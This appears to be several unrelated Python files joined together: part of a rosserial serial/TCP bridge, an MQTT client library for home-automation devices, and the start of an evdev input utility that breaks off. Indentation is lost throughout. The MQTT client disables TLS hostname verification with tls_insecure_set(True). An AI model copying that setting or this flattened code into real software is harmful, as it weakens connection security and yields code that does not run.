try:
m = __import__( package + '.' + directory )
except:
rospy.logerr( "Cannot import package : %s"% package )
rospy.logerr( "sys.path was " + str(path) )
return None
return m
def load_message(package, message):
m = load_pkg_module(package, 'msg')
m2 = getattr(m, 'msg')
return getattr(m2, message)
def load_service(package,service):
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
srv = getattr(s, service)
mreq = getattr(s, service+"Request")
mres = getattr(s, service+"Response")
return srv,mreq,mres
class Publisher:
"""
Publisher forwards messages from the serial device to ROS.
"""
def __init__(self, topic_info):
""" Create a new publisher. """
self.topic = topic_info.topic_name
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.publisher = rospy.Publisher(self.topic, self.message, queue_size=10)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def handlePacket(self, data):
""" Forward message to ROS network. """
m = self.message()
m.deserialize(data)
self.publisher.publish(m)
class Subscriber:
"""
Subscriber forwards messages from ROS to the serial device.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.id = topic_info.topic_id
self.parent = parent
# find message type
package, message = topic_info.message_type.split('/')
self.message = load_message(package, message)
if self.message._md5sum == topic_info.md5sum:
self.subscriber = rospy.Subscriber(self.topic, self.message, self.callback)
else:
raise Exception('Checksum does not match: ' + self.message._md5sum + ',' + topic_info.md5sum)
def unregister(self):
rospy.loginfo("Removing subscriber: %s", self.topic)
self.subscriber.unregister()
def callback(self, msg):
""" Forward message to serial device. """
data_buffer = StringIO.StringIO()
msg.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
def unregister(self):
self.subscriber.unregister()
class ServiceServer:
"""
ServiceServer responds to requests from ROS.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
self.service = rospy.Service(self.topic, srv, self.callback)
# response message
self.data = None
def unregister(self):
rospy.loginfo("Removing service: %s", self.topic)
self.service.shutdown()
def callback(self, req):
""" Forward request to serial device. """
data_buffer = StringIO.StringIO()
req.serialize(data_buffer)
self.response = None
if self.parent.send(self.id, data_buffer.getvalue()) >= 0:
while self.response == None:
pass
return self.response
def handlePacket(self, data):
""" Forward response to ROS network. """
r = self.mres()
r.deserialize(data)
self.response = r
class ServiceClient:
"""
ServiceClient forwards requests from the serial device to ROS services.
"""
def __init__(self, topic_info, parent):
self.topic = topic_info.topic_name
self.parent = parent
# find message type
package, service = topic_info.message_type.split('/')
s = load_pkg_module(package, 'srv')
s = getattr(s, 'srv')
self.mreq = getattr(s, service+"Request")
self.mres = getattr(s, service+"Response")
srv = getattr(s, service)
rospy.loginfo("Starting service client, waiting for service '" + self.topic + "'")
rospy.wait_for_service(self.topic)
self.proxy = rospy.ServiceProxy(self.topic, srv)
def handlePacket(self, data):
""" Forward request to ROS network. """
req = self.mreq()
req.deserialize(data)
# call service proxy
resp = self.proxy(req)
# serialize and publish
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.parent.send(self.id, data_buffer.getvalue())
class RosSerialServer:
"""
RosSerialServer waits for a socket connection then passes itself, forked as a
new process, to SerialClient which uses it as a serial port. It continues to listen
for additional connections. Each forked process is a new ros node, and proxies ros
operations (e.g. publish/subscribe) from its connection to the rest of ros.
"""
def __init__(self, tcp_portnum, fork_server=False):
print "Fork_server is: ", fork_server
self.tcp_portnum = tcp_portnum
self.fork_server = fork_server
def listen(self):
self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#bind the socket to a public host, and a well-known port
self.serversocket.bind(("", self.tcp_portnum)) #become a server socket
self.serversocket.listen(1)
while True:
#accept connections
print "waiting for socket connection"
(clientsocket, address) = self.serversocket.accept()
#now do something with the clientsocket
rospy.loginfo("Established a socket connection from %s on port %s" % (address))
self.socket = clientsocket
self.isConnected = True
if (self.fork_server == True): # if configured to launch server in a separate process
rospy.loginfo("Forking a socket server process")
process = multiprocessing.Process(target=self.startSocketServer, args=(address))
process.daemon = True
process.start()
rospy.loginfo("launched startSocketServer")
else:
rospy.loginfo("calling startSerialClient")
self.startSerialClient()
rospy.loginfo("startSerialClient() exited")
def startSerialClient(self):
client = SerialClient(self)
try:
client.run()
except KeyboardInterrupt:
pass
except RuntimeError:
rospy.loginfo("RuntimeError exception caught")
self.isConnected = False
except socket.error:
rospy.loginfo("socket.error exception caught")
self.isConnected = False
finally:
self.socket.close()
for sub in client.subscribers.values():
sub.unregister()
for srv in client.services.values():
srv.unregister()
#pass
def startSocketServer(self, port, address):
rospy.loginfo("starting ROS Serial Python Node serial_node-%r" % (address,))
rospy.init_node("serial_node_%r" % (address,))
self.startSerialClient()
def flushInput(self):
pass
def write(self, data):
if (self.isConnected == False):
return
length = len(data)
totalsent = 0
while totalsent < length:
sent = self.socket.send(data[totalsent:])
if sent == 0:
raise RuntimeError("RosSerialServer.write() socket connection broken")
totalsent = totalsent + sent
def read(self, rqsted_length):
self.msg = ''
if (self.isConnected == False):
return self.msg
while len(self.msg) < rqsted_length:
chunk = self.socket.recv(rqsted_length - len(self.msg))
if chunk == '':
raise RuntimeError("RosSerialServer.read() socket connection broken")
self.msg = self.msg + chunk
return self.msg
def close(self):
self.port.close()
def inWaiting(self):
try: # the caller checks just for <1, so we'll peek at just one byte
chunk = self.socket.recv(1, socket.MSG_DONTWAIT|socket.MSG_PEEK)
if chunk == '':
raise RuntimeError("RosSerialServer.inWaiting() socket connection broken")
return len(chunk)
except socket.error, e:
if e.args[0] == errno.EWOULDBLOCK:
return 0
raise
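def serve_tcp(tcp_port=11411, fork_server=True):
    """Hedged usage sketch (illustration only, not part of the original node
    script): expose rosserial over TCP and fork one node per incoming
    connection. Blocks in listen() and requires a running ROS master."""
    rospy.init_node("serial_node")
    RosSerialServer(tcp_port, fork_server=fork_server).listen()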
class SerialClient:
"""
SerialClient bridges publishers, subscribers and services between the serial device and ROS.
"""
def __init__(self, port=None, baud=57600, timeout=5.0):
""" Initialize node, connect to bus, attempt to negotiate topics. """
self.mutex = thread.allocate_lock()
self.lastsync = rospy.Time(0)
self.lastsync_lost = rospy.Time(0)
self.timeout = timeout
self.synced = False
self.pub_diagnostics = rospy.Publisher('/diagnostics', diagnostic_msgs.msg.DiagnosticArray, queue_size=10)
if port== None:
# no port specified, listen for any new port?
pass
elif hasattr(port, 'read'):
# assume it's a file-like object
self.port=port
else:
# open a specific port
try:
self.port = Serial(port, baud, timeout=self.timeout*0.5)
except SerialException as e:
rospy.logerr("Error opening serial: %s", e)
rospy.signal_shutdown("Error opening serial: %s" % e)
raise SystemExit
self.port.timeout = 0.01 # Edit the port timeout
time.sleep(0.1) # Wait for ready (patch for Uno)
# hydro introduces protocol ver2 which must match node_handle.h
# The protocol version is sent as the 2nd sync byte emitted by each end
self.protocol_ver1 = '\xff'
self.protocol_ver2 = '\xfe'
self.protocol_ver = self.protocol_ver2
self.publishers = dict() # id:Publishers
self.subscribers = dict() # topic:Subscriber
self.services = dict() # topic:Service
self.buffer_out = -1
self.buffer_in = -1
self.callbacks = dict()
# endpoints for creating new pubs/subs
self.callbacks[TopicInfo.ID_PUBLISHER] = self.setupPublisher
self.callbacks[TopicInfo.ID_SUBSCRIBER] = self.setupSubscriber
# service client/servers have 2 creation endpoints (a publisher and a subscriber)
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_PUBLISHER] = self.setupServiceServerPublisher
self.callbacks[TopicInfo.ID_SERVICE_SERVER+TopicInfo.ID_SUBSCRIBER] = self.setupServiceServerSubscriber
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_PUBLISHER] = self.setupServiceClientPublisher
self.callbacks[TopicInfo.ID_SERVICE_CLIENT+TopicInfo.ID_SUBSCRIBER] = self.setupServiceClientSubscriber
# custom endpoints
self.callbacks[TopicInfo.ID_PARAMETER_REQUEST] = self.handleParameterRequest
self.callbacks[TopicInfo.ID_LOG] = self.handleLoggingRequest
self.callbacks[TopicInfo.ID_TIME] = self.handleTimeRequest
rospy.sleep(2.0) # TODO
self.requestTopics()
self.lastsync = rospy.Time.now()
signal.signal(signal.SIGINT, self.txStopRequest)
def requestTopics(self):
""" Determine topics to subscribe/publish. """
self.port.flushInput()
# request topic sync
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x00\x00\xff")
def txStopRequest(self, signal, frame):
""" send stop tx request to arduino when receive SIGINT(Ctrl-c)"""
self.port.flushInput()
self.port.write("\xff" + self.protocol_ver + "\x00\x00\xff\x0b\x00\xf4")
# the tx_stop_request topic id is 0x0b
rospy.loginfo("Send tx stop request")
sys.exit(0)
def tryRead(self, length):
try:
bytes_read = self.port.read(length)
if len(bytes_read) < length:
rospy.logwarn("Serial Port read returned short (expected %d bytes, received %d instead)."
% (length, len(bytes_read)))
raise IOError()
return bytes_read
except Exception as e:
rospy.logwarn("Serial Port read failure: %s", e)
raise IOError()
def run(self):
""" Forward recieved messages to appropriate publisher. """
data = ''
while not rospy.is_shutdown():
if (rospy.Time.now() - self.lastsync).to_sec() > (self.timeout * 3):
if (self.synced == True):
rospy.logerr("Lost sync with device, restarting...")
else:
rospy.logerr("Unable to sync with device; possible link problem or link software version mismatch such as hydro rosserial_python with groovy Arduino")
self.lastsync_lost = rospy.Time.now()
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "no sync with device")
self.requestTopics()
self.lastsync = rospy.Time.now()
# This try-block is here because we make multiple calls to read(). Any one of them can throw
# an IOError if there's a serial problem or timeout. In that scenario, a single handler at the
# bottom attempts to reconfigure the topics.
try:
if self.port.inWaiting() < 1:
time.sleep(0.001)
continue
flag = [0,0]
flag[0] = self.tryRead(1)
if (flag[0] != '\xff'):
continue
flag[1] = self.tryRead(1)
if ( flag[1] != self.protocol_ver):
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
rospy.logerr("Mismatched protocol version in packet: lost sync or rosserial_python is from different ros release than the rosserial client")
protocol_ver_msgs = {'\xff': 'Rev 0 (rosserial 0.4 and earlier)', '\xfe': 'Rev 1 (rosserial 0.5+)', '\xfd': 'Some future rosserial version'}
if (flag[1] in protocol_ver_msgs):
found_ver_msg = 'Protocol version of client is ' + protocol_ver_msgs[flag[1]]
else:
found_ver_msg = "Protocol version of client is unrecognized"
rospy.loginfo("%s, expected %s" % (found_ver_msg, protocol_ver_msgs[self.protocol_ver]))
continue
msg_len_bytes = self.tryRead(2)
msg_length, = struct.unpack("<h", msg_len_bytes)
msg_len_chk = self.tryRead(1)
msg_len_checksum = sum(map(ord, msg_len_bytes)) + ord(msg_len_chk)
if msg_len_checksum % 256 != 255:
rospy.loginfo("wrong checksum for msg length, length %d" %(msg_length))
rospy.loginfo("chk is %d" % ord(msg_len_chk))
continue
# topic id (2 bytes)
topic_id_header = self.tryRead(2)
topic_id, = struct.unpack("<h", topic_id_header)
try:
msg = self.tryRead(msg_length)
except IOError:
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Packet Failed : Failed to read msg data")
rospy.loginfo("Packet Failed : Failed to read msg data")
rospy.loginfo("msg len is %d",len(msg))
raise
# checksum for topic id and msg
chk = self.tryRead(1)
checksum = sum(map(ord, topic_id_header) ) + sum(map(ord, msg)) + ord(chk)
if checksum % 256 == 255:
self.synced = True
try:
self.callbacks[topic_id](msg)
except KeyError:
rospy.logerr("Tried to publish before configured, topic id %d" % topic_id)
rospy.sleep(0.001)
else:
rospy.loginfo("wrong checksum for topic id and msg")
except IOError:
# One of the read calls had an issue. Just to be safe, request that the client
# reinitialize their topics.
self.requestTopics()
def setPublishSize(self, bytes):
if self.buffer_out < 0:
self.buffer_out = bytes
rospy.loginfo("Note: publish buffer size is %d bytes" % self.buffer_out)
def setSubscribeSize(self, bytes):
if self.buffer_in < 0:
self.buffer_in = bytes
rospy.loginfo("Note: subscribe buffer size is %d bytes" % self.buffer_in)
def setupPublisher(self, data):
""" Register a new publisher. """
try:
msg = TopicInfo()
msg.deserialize(data)
pub = Publisher(msg)
self.publishers[msg.topic_id] = pub
self.callbacks[msg.topic_id] = pub.handlePacket
self.setPublishSize(msg.buffer_size)
rospy.loginfo("Setup publisher on %s [%s]" % (msg.topic_name, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of publisher failed: %s", e)
def setupSubscriber(self, data):
""" Register a new subscriber. """
try:
msg = TopicInfo()
msg.deserialize(data)
if not msg.topic_name in self.subscribers.keys():
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Setup subscriber on %s [%s]" % (msg.topic_name, msg.message_type) )
elif msg.message_type != self.subscribers[msg.topic_name].message._type:
old_message_type = self.subscribers[msg.topic_name].message._type
self.subscribers[msg.topic_name].unregister()
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Change the message type of subscriber on %s from [%s] to [%s]" % (msg.topic_name, old_message_type, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of subscriber failed: %s", e)
def setupServiceServerPublisher(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceServerSubscriber(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceClientPublisher(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def setupServiceClientSubscriber(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def handleTimeRequest(self, data):
""" Respond to device with system time. """
t = Time()
t.data = rospy.Time.now()
data_buffer = StringIO.StringIO()
t.serialize(data_buffer)
self.send( TopicInfo.ID_TIME, data_buffer.getvalue() )
self.lastsync = rospy.Time.now()
def handleParameterRequest(self, data):
""" Send parameters to device. Supports only simple datatypes and arrays of such. """
req = RequestParamRequest()
req.deserialize(data)
resp = RequestParamResponse()
try:
param = rospy.get_param(req.name)
except KeyError:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if param == None:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if (type(param) == dict):
rospy.logerr("Cannot send param %s because it is a dictionary"%req.name)
return
if (type(param) != list):
param = [param]
#check to make sure that all parameters in list are same type
t = type(param[0])
for p in param:
if t!= type(p):
rospy.logerr('All parameters in the list %s must be of the same type' % req.name)
return
if (t == int):
resp.ints= param
if (t == float):
resp.floats=param
if (t == str):
resp.strings = param
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.send(TopicInfo.ID_PARAMETER_REQUEST, data_buffer.getvalue())
def handleLoggingRequest(self, data):
""" Forward logging information from serial device into ROS. """
msg = Log()
msg.deserialize(data)
if (msg.level == Log.ROSDEBUG):
rospy.logdebug(msg.msg)
elif(msg.level== Log.INFO):
rospy.loginfo(msg.msg)
elif(msg.level== Log.WARN):
rospy.logwarn(msg.msg)
elif(msg.level== Log.ERROR):
rospy.logerr(msg.msg)
elif(msg.level==Log.FATAL):
rospy.logfatal(msg.msg)
def send(self, topic, msg):
""" Send a message on a particular topic to the device. """
with self.mutex:
length = len(msg)
if self.buffer_in > 0 and length > self.buffer_in:
rospy.logerr("Message from ROS network dropped: message larger than buffer.")
print msg
return -1
else:
#modified frame : header(2 bytes) + msg_len(2 bytes) + msg_len_chk(1 byte) + topic_id(2 bytes) + msg(x bytes) + msg_topic_id_chk(1 byte)
# second byte of header is protocol version
msg_len_checksum = 255 - ( ((length&255) + (length>>8))%256 )
msg_checksum = 255 - ( ((topic&255) + (topic>>8) + sum([ord(x) for x in msg]))%256 )
data = "\xff" + self.protocol_ver + chr(length&255) + chr(length>>8) + chr(msg_len_checksum) + chr(topic&255) + chr(topic>>8)
data = data + msg + chr(msg_checksum)
self.port.write(data)
return length
def sendDiagnostics(self, level, msg_text):
msg = diagnostic_msgs.msg.DiagnosticArray()
status = diagnostic_msgs.msg.DiagnosticStatus()
status.name = "rosserial_python"
msg.header.stamp = rospy.Time.now()
msg.status.append(status)
status.message = msg_text
status.level = level
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[0].key="last sync"
if self.lastsync.to_sec()>0:
status.values[0].value=time.ctime(self.lastsync.to_sec())
else:
status.values[0].value="never"
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[1].key="last sync lost"
status.values[1].value=time.ctime(self.lastsync_lost.to_sec())
self.pub_diagnostics.publish(msg)
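# --- Editor's illustrative sketch; not part of the original rosserial module ---
# send() above frames every packet as:
#   0xff | protocol_ver | len_lo | len_hi | len_chk | id_lo | id_hi | payload | msg_chk
# The helper below repeats the same checksum arithmetic on a hypothetical topic id
# and payload so the framing can be verified in isolation.
def _example_frame_checksums(topic_id, payload):
    """Return (msg_len_checksum, msg_checksum) as SerialClient.send() computes them."""
    length = len(payload)
    msg_len_checksum = 255 - (((length & 255) + (length >> 8)) % 256)
    msg_checksum = 255 - (((topic_id & 255) + (topic_id >> 8) +
                           sum(ord(c) for c in payload)) % 256)
    return msg_len_checksum, msg_checksum
# e.g. _example_frame_checksums(125, '\x01\x00') == (253, 129)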
|
coco.py
|
import json
import logging
import os
import threading
from time import sleep
from typing import Callable
import paho.mqtt.client as mqtt
from .coco_device_class import CoCoDeviceClass
from .coco_fan import CoCoFan
from .coco_light import CoCoLight
from .coco_switch import CoCoSwitch
from .coco_switched_fan import CoCoSwitchedFan
from .coco_climate import CoCoThermostat
from .coco_energy import CoCoEnergyMeter
from .coco_cover import CoCoCover
from .coco_accesscontrol import CoCoAccessControl
from .coco_generic import CoCoGeneric
from .const import *
from .helpers import *
_LOGGER = logging.getLogger(__name__)
sem = threading.Semaphore()
DEVICE_SETS = {
CoCoDeviceClass.SWITCHED_FANS: {INTERNAL_KEY_CLASS: CoCoSwitchedFan, INTERNAL_KEY_MODELS: LIST_VALID_SWITCHED_FANS},
CoCoDeviceClass.FANS: {INTERNAL_KEY_CLASS: CoCoFan, INTERNAL_KEY_MODELS: LIST_VALID_FANS},
CoCoDeviceClass.COVERS: {INTERNAL_KEY_CLASS: CoCoCover, INTERNAL_KEY_MODELS: LIST_VALID_COVERS},
CoCoDeviceClass.SWITCHES: {INTERNAL_KEY_CLASS: CoCoSwitch, INTERNAL_KEY_MODELS: LIST_VALID_SWITCHES},
CoCoDeviceClass.LIGHTS: {INTERNAL_KEY_CLASS: CoCoLight, INTERNAL_KEY_MODELS: LIST_VALID_LIGHTS},
CoCoDeviceClass.THERMOSTATS: {INTERNAL_KEY_CLASS: CoCoThermostat, INTERNAL_KEY_MODELS: LIST_VALID_THERMOSTATS},
CoCoDeviceClass.ENERGYMETERS: {INTERNAL_KEY_CLASS: CoCoEnergyMeter, INTERNAL_KEY_MODELS: LIST_VALID_ENERGYMETERS},
CoCoDeviceClass.ACCESSCONTROL: {INTERNAL_KEY_CLASS: CoCoAccessControl, INTERNAL_KEY_MODELS: LIST_VALID_ACCESSCONTROL},
CoCoDeviceClass.GENERIC: {INTERNAL_KEY_CLASS: CoCoGeneric, INTERNAL_KEY_MODELS: LIST_VALID_GENERICS}
}
class CoCo:
def __init__(self, address, username, password, port=8884, ca_path=None, switches_as_lights=False):
if switches_as_lights:
DEVICE_SETS[CoCoDeviceClass.LIGHTS] = {INTERNAL_KEY_CLASS: CoCoLight,
INTERNAL_KEY_MODELS: LIST_VALID_LIGHTS + LIST_VALID_SWITCHES}
DEVICE_SETS[CoCoDeviceClass.SWITCHES] = {INTERNAL_KEY_CLASS: CoCoSwitch, INTERNAL_KEY_MODELS: []}
# The device control buffer fields
self._keep_thread_running = True
self._device_control_buffer = {}
self._device_control_buffer_size = DEVICE_CONTROL_BUFFER_SIZE
self._device_control_buffer_command_size = DEVICE_CONTROL_BUFFER_COMMAND_SIZE
self._device_control_buffer_command_count = 0
self._device_control_buffer_thread = threading.Thread(target=self._publish_device_control_commands)
self._device_control_buffer_thread.start()
if ca_path is None:
ca_path = os.path.dirname(os.path.realpath(__file__)) + MQTT_CERT_FILE
client = mqtt.Client(protocol=MQTT_PROTOCOL, transport=MQTT_TRANSPORT)
client.username_pw_set(username, password)
client.tls_set(ca_path)
client.tls_insecure_set(True)
self._client = client
self._address = address
self._port = port
self._profile_creation_id = username
self._all_devices = None
self._device_callbacks = {}
self._devices = {}
self._devices_callback = {}
self._system_info = None
self._system_info_callback = lambda x: None
def __del__(self):
self._keep_thread_running = False
self._client.disconnect()
def connect(self):
def _on_message(client, userdata, message):
topic = message.topic
response = json.loads(message.payload)
if topic == self._profile_creation_id + MQTT_TOPIC_PUBLIC_RSP and \
response[KEY_METHOD] == MQTT_METHOD_SYSINFO_PUBLISH:
self._system_info = response
self._system_info_callback(self._system_info)
elif topic == (self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP) and \
response[KEY_METHOD] == MQTT_METHOD_DEVICES_LIST:
self._client.unsubscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP)
self._process_devices_list(response)
elif topic == (self._profile_creation_id + MQTT_TOPIC_SUFFIX_SYS_EVT) and \
response[KEY_METHOD] == MQTT_METHOD_SYSINFO_PUBLISHED:
# If the connected controller publishes sysinfo... we expect something to have changed.
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP, qos=1)
client.publish(self._profile_creation_id + MQTT_TOPIC_SUFFIX_CMD,
json.dumps({KEY_METHOD: MQTT_METHOD_DEVICES_LIST}), 1)
elif topic == (self._profile_creation_id + MQTT_TOPIC_SUFFIX_EVT) and \
(response[KEY_METHOD] == MQTT_METHOD_DEVICES_STATUS or response[KEY_METHOD] == MQTT_METHOD_DEVICES_CHANGED):
devices = extract_devices(response)
for device in devices:
try:
if KEY_UUID in device:
self._device_callbacks[device[KEY_UUID]][INTERNAL_KEY_CALLBACK](device)
except:
pass
def _on_connect(client, userdata, flags, rc):
if rc == 0:
_LOGGER.info('Connected!')
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_RSP, qos=1)
client.subscribe(self._profile_creation_id + MQTT_TOPIC_PUBLIC_RSP, qos=1)
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_EVT, qos=1)
client.subscribe(self._profile_creation_id + MQTT_TOPIC_SUFFIX_SYS_EVT, qos=1)
client.publish(self._profile_creation_id + MQTT_TOPIC_PUBLIC_CMD,
json.dumps({KEY_METHOD: MQTT_METHOD_SYSINFO_PUBLISH}), 1)
client.publish(self._profile_creation_id + MQTT_TOPIC_SUFFIX_CMD,
json.dumps({KEY_METHOD: MQTT_METHOD_DEVICES_LIST}), 1)
elif MQTT_RC_CODES[rc]:
raise Exception(MQTT_RC_CODES[rc])
else:
raise Exception('Unknown error')
def _on_disconnect(client, userdata, rc):
_LOGGER.warning('Disconnected')
for uuid, device_callback in self._device_callbacks.items():
offline = {'Online': 'False', KEY_UUID: uuid}
device_callback[INTERNAL_KEY_CALLBACK](offline)
self._client.on_message = _on_message
self._client.on_connect = _on_connect
self._client.on_disconnect = _on_disconnect
self._client.connect_async(self._address, self._port)
self._client.loop_start()
def disconnect(self):
self._client.loop_stop()
self._client.disconnect()
def get_systeminfo(self, callback):
self._system_info_callback = callback
if self._system_info:
self._system_info_callback(self._system_info)
def get_devices(self, device_class: CoCoDeviceClass, callback: Callable):
self._devices_callback[device_class] = callback
if self._devices and device_class in self._devices:
self._devices_callback[device_class](self._devices[device_class])
def _publish_device_control_commands(self):
while self._keep_thread_running:
device_commands_to_process = None
sem.acquire()
if len(self._device_control_buffer.keys()) > 0:
device_commands_to_process = self._device_control_buffer
self._device_control_buffer = {}
self._device_control_buffer_command_count = 0
sem.release()
if device_commands_to_process is not None:
command = process_device_commands(device_commands_to_process)
#_LOGGER.debug(json.dumps(command))
self._client.publish(self._profile_creation_id + MQTT_TOPIC_SUFFIX_CMD, json.dumps(command), 1)
sleep(0.05)
def _add_device_control(self, uuid, property_key, property_value):
# Busy-wait until the publish thread has drained the buffer enough to
# accept another command.
while len(self._device_control_buffer.keys()) >= self._device_control_buffer_size or \
self._device_control_buffer_command_count >= self._device_control_buffer_command_size:
pass
sem.acquire()
self._device_control_buffer_command_count += 1
if uuid not in self._device_control_buffer:
self._device_control_buffer[uuid] = {}
self._device_control_buffer[uuid][property_key] = property_value
sem.release()
# Processes response on devices.list
def _process_devices_list(self, response):
# Only add devices that are actionable
actionable_devices = list(
filter(lambda d: d[KEY_TYPE] == DEV_TYPE_ACTION, extract_devices(response)))
actionable_devices.extend(list(
filter(lambda d: d[KEY_TYPE] == "thermostat", extract_devices(response))))
actionable_devices.extend(list(
filter(lambda d: d[KEY_TYPE] == "centralmeter", extract_devices(response))))
# Only prepare for devices that don't already exist
# TODO - Can't we do this when we need it (in initialize_devices ?)
existing_uuids = list(self._device_callbacks.keys())
for actionable_device in actionable_devices:
if actionable_device[KEY_UUID] not in existing_uuids:
self._device_callbacks[actionable_device[KEY_UUID]] = \
{INTERNAL_KEY_CALLBACK: None, KEY_ENTITY: None}
# Initialize
self.initialize_devices(CoCoDeviceClass.SWITCHED_FANS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.FANS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.SWITCHES, actionable_devices)
self.initialize_devices(CoCoDeviceClass.LIGHTS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.COVERS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.THERMOSTATS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.ENERGYMETERS, actionable_devices)
self.initialize_devices(CoCoDeviceClass.GENERIC, actionable_devices)
def initialize_devices(self, device_class, actionable_devices):
base_devices = [x for x in actionable_devices if x[KEY_MODEL]
in DEVICE_SETS[device_class][INTERNAL_KEY_MODELS]]
if device_class not in self._devices:
self._devices[device_class] = []
for base_device in base_devices:
if self._device_callbacks[base_device[KEY_UUID]] and self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY] and \
self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY].uuid:
self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY].update_dev(base_device)
else:
self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY] = \
DEVICE_SETS[device_class][INTERNAL_KEY_CLASS](base_device,
self._device_callbacks[base_device[KEY_UUID]],
self._client,
self._profile_creation_id,
self._add_device_control)
self._devices[device_class].append(self._device_callbacks[base_device[KEY_UUID]][KEY_ENTITY])
if device_class in self._devices_callback:
self._devices_callback[device_class](self._devices[device_class])
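# Illustrative usage sketch (editor's addition, not part of the library).
# The host, credentials and callback below are hypothetical; the class, methods
# and CoCoDeviceClass values all come from this module.
#
#   coco = CoCo('192.168.1.2', 'profile-uuid', 'password')
#   coco.connect()
#   coco.get_devices(CoCoDeviceClass.LIGHTS,
#                    lambda lights: print('discovered %d lights' % len(lights)))
#   ...
#   coco.disconnect()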
|
evdev_utils.py
|
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import asyncore
from cros.factory.utils import process_utils
from cros.factory.external import evdev
def GetDevices():
"""Gets all the input devices.
Returns:
A list of evdev.InputDevice() instances of the input devices.
"""
return [evdev.InputDevice(d) for d in evdev.list_devices()]
def FilterEvdevEcodes(dev, cnf):
"""Check if the capabilities of the device satisfy that of the CNF
Args:
dev: evdev.InputDevice
cnf: list of lists of evdev.ecodes
Returns:
True if dev satisfies cnf
"""
caps = set(dev.capabilities().get(evdev.ecodes.EV_KEY, []))
for clause in cnf:
if set(clause) & caps == set():
return False
return True
def IsLidEventDevice(dev):
"""Check if a device is with EV_SW and SW_LID capabilities.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a lid event device.
"""
